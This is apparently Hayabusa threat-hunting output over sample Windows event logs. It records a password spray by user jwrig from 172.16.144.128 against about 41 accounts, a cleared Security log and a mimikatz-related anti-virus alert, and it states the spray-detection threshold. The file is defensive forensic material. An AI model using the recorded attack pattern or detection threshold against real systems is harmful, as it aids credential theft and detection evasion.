2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 04:27:00.297 +09:00,DESKTOP-JR78RLP,1102,high,Evas,Security Log Cleared,User: jwrig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:02.847 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:02.847 +09:00,-,-,medium,CredAccess,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:41 TargetUserName:wstrzelec/zmathis/lpesce/psmith/lschifano/sanson/sarmstrong/drook/bgalbraith/melliott/bhostetler/edygert/ebooth/jleytevidal/jorchilles/bking/cdavis/jwright/celgee/jlake/gsalinas/jkulikowski/mdouglas/dpendolino/thessman/cfleener/cspizor/rbowes/bgreenwood/cmoody/mtoussain/eskoudis/smisenar/kperryman/cragoso/ssims/Administrator/dmashburn/baker/tbennett/econrad IpAddress:172.16.144.128 timeframe:5m,rules/hayabusa/default/alerts/Security/4648_BruteForce_PasswordSprayDetect.yml,-
2019-05-01 04:27:03.925 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:05.020 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:06.085 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:07.171 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:08.254 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:09.323 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:10.377 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:11.465 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:12.549 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:13.611 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:14.687 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:15.750 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:16.841 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:17.922 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:19.035 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:20.097 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:21.156 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:22.222 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:23.295 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:24.342 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:25.404 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:26.504 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:27.583 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:28.654 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:29.712 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:30.787 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:31.861 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:32.955 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:34.020 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:35.081 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:36.151 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:37.238 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:38.310 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:39.393 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:40.457 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:41.553 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:42.613 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:43.686 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:44.738 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:45.818 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:46.896 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:47.953 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:49.019 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:50.082 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:51.156 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:52.214 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:53.285 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:54.354 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:55.438 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:56.513 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:57.578 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:58.661 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:59.721 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:00.795 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:01.865 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:02.941 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:04.015 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:05.097 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:06.182 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:07.239 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:08.315 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:09.399 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:10.468 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:11.549 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:12.621 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:13.709 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:14.769 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:15.849 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:16.918 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:17.999 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:19.068 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:20.129 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:21.201 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:22.250 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:23.338 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:24.404 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:25.468 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
